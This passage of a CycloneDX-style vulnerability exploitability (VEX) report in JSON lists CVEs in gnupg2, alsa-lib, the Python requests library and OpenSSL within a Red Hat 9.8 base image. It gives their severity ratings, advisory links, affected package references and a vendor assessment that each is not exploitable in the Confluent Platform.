          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-25068",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        129
      ],
      "description": "alsa-lib versions 1.2.2 up to and including 1.2.15.2, prior to commit 5f7fe33, contain a heap-based buffer overflow in the topology mixer control decoder. The tplg_decode_control_mixer1() function reads the num_channels field from untrusted .tplg data and uses it as a loop bound without validating it against the fixed-size channel array (SND_TPLG_MAX_CHAN). A crafted topology file with an excessive num_channels value can cause out-of-bounds heap writes, leading to a crash.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-25068"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-25068"
        },
        {
          "url": "https://github.com/alsa-project/alsa-lib/commit/5f7fe33002d2d98d84f72e381ec2cccc0d5d3d40"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2026/02/msg00008.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25068"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8044-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8044-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-25068"
        },
        {
          "url": "https://www.vulncheck.com/advisories/alsa-lib-topology-decoder-heap-based-buffer-overflow"
        }
      ],
      "published": "2026-01-29T20:16:10+00:00",
      "updated": "2026-06-17T10:24:04+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/alsa-lib@1.2.15.3-1.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "1.2.15.3-1.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/alsa-lib@1.2.15.3-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/alsa-lib@1.2.15.3-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/alsa-lib@1.2.15.3-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/alsa-lib@1.2.15.3-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/alsa-lib@1.2.15.3-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/alsa-lib@1.2.15.3-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/alsa-lib@1.2.15.3-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/alsa-lib@1.2.15.3-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/alsa-lib@1.2.15.3-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/alsa-lib@1.2.15.3-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/alsa-lib@1.2.15.3-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/alsa-lib@1.2.15.3-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/alsa-lib@1.2.15.3-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/alsa-lib@1.2.15.3-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/alsa-lib@1.2.15.3-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/alsa-lib@1.2.15.3-1.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-25645",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
      },
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 4.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N"
        }
      ],
      "cwes": [
        377
      ],
      "description": "Requests is a HTTP library. Prior to version 2.33.0, the `requests.utils.extract_zipped_paths()` utility function uses a predictable filename when extracting files from zip archives into the system temporary directory. If the target file already exists, it is reused without validation. A local attacker with write access to the temp directory could pre-create a malicious file that would be loaded in place of the legitimate one. Standard usage of the Requests library is not affected by this vulnerability. Only applications that call `extract_zipped_paths()` directly are impacted. Starting in version 2.33.0, the library extracts files to a non-deterministic location. If developers are unable to upgrade, they can set `TMPDIR` in their environment to a directory with restricted write access.",
      "recommendation": "Upgrade requests to version 2.33.0",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-25645"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-25645"
        },
        {
          "url": "https://github.com/psf/requests"
        },
        {
          "url": "https://github.com/psf/requests/commit/66d21cb07bd6255b1280291c4fafb71803cdb3b7"
        },
        {
          "url": "https://github.com/psf/requests/releases/tag/v2.33.0"
        },
        {
          "url": "https://github.com/psf/requests/security/advisories/GHSA-gc5v-m9x4-r6x2"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25645"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-25645"
        }
      ],
      "published": "2026-03-25T17:16:52+00:00",
      "updated": "2026-06-17T10:25:00+00:00",
      "affects": [
        {
          "ref": "pkg:pypi/requests@2.32.5",
          "versions": [
            {
              "version": "2.32.5",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "21.3.1-2.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:pypi/requests@2.32.5"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:pypi/requests@2.32.5"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:pypi/requests@2.32.5"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:pypi/requests@2.32.5"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:pypi/requests@2.32.5"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:pypi/requests@2.32.5"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:pypi/requests@2.32.5"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:pypi/requests@2.32.5"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:pypi/requests@2.32.5"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:pypi/requests@2.32.5"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:pypi/requests@2.32.5"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:pypi/requests@2.32.5"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:pypi/requests@2.32.5"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-2673",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        757
      ],
      "description": "Issue summary: An OpenSSL TLS 1.3 server may fail to negotiate the expected\npreferred key exchange group when its key exchange group configuration includes\nthe default by using the 'DEFAULT' keyword.\n\nImpact summary: A less preferred key exchange may be used even when a more\npreferred group is supported by both client and server, if the group\nwas not included among the client's initial predicated keyshares.\nThis will sometimes be the case with the new hybrid post-quantum groups,\nif the client chooses to defer their use until specifically requested by\nthe server.\n\nIf an OpenSSL TLS 1.3 server's configuration uses the 'DEFAULT' keyword to\ninterpolate the built-in default group list into its own configuration, perhaps\nadding or removing specific elements, then an implementation defect causes the\n'DEFAULT' list to lose its 'tuple' structure, and all server-supported groups\nwere treated as a single sufficiently secure 'tuple', with the server not\nsending a Hello Retry Request (HRR) even when a group in a more preferred tuple\nwas mutually supported.\n\nAs a result, the client and server might fail to negotiate a mutually supported\npost-quantum key agreement group, such as 'X25519MLKEM768', if the client's\nconfiguration results in only 'classical' groups (such as 'X25519' being the\nonly ones in the client's initial keyshare prediction).\n\nOpenSSL 3.5 and later support a new syntax for selecting the most preferred TLS\n1.3 key agreement group on TLS servers.  The old syntax had a single 'flat'\nlist of groups, and treated all the supported groups as sufficiently secure.\nIf any of the keyshares predicted by the client were supported by the server\nthe most preferred among these was selected, even if other groups supported by\nthe client, but not included in the list of predicted keyshares would have been\nmore preferred, if included.\n\nThe new syntax partitions the groups into distinct 'tuples' of roughly\nequivalent security.  Within each tuple the most preferred group included among\nthe client's predicted keyshares is chosen, but if the client supports a group\nfrom a more preferred tuple, but did not predict any corresponding keyshares,\nthe server will ask the client to retry the ClientHello (by issuing a Hello\nRetry Request or HRR) with the most preferred mutually supported group.\n\nThe above works as expected when the server's configuration uses the built-in\ndefault group list, or explicitly defines its own list by directly defining the\nvarious desired groups and group 'tuples'.\n\nNo OpenSSL FIPS modules are affected by this issue, the code in question lies\noutside the FIPS boundary.\n\nOpenSSL 3.6 and 3.5 are vulnerable to this issue.\n\nOpenSSL 3.6 users should upgrade to OpenSSL 3.6.2 once it is released.\nOpenSSL 3.5 users should upgrade to OpenSSL 3.5.6 once it is released.\n\nOpenSSL 3.4, 3.3, 3.0, 1.0.2 and 1.1.1 are not affected by this issue.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-2673"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/03/13/3"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-2673"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-032379.html"
        },
        {
          "url": "https://github.com/advisories/GHSA-wj64-gh9j-xm82"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/2157c9d81f7b0bd7dfa25b960e928ec28e8dd63f"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/85977e013f32ceb96aa034c0e741adddc1a05e34"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2673"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20260313.txt"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8155-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-2673"
        }
      ],
      "published": "2026-03-13T19:54:34+00:00",
      "updated": "2026-06-17T10:31:30+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.0.7-11.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl-fips-provider@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.0.7-11.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1",
          "versions": [
            {
              "version": "1:3.5.5-5.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1",
          "versions": [
            {
              "version": "1:3.5.5-5.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
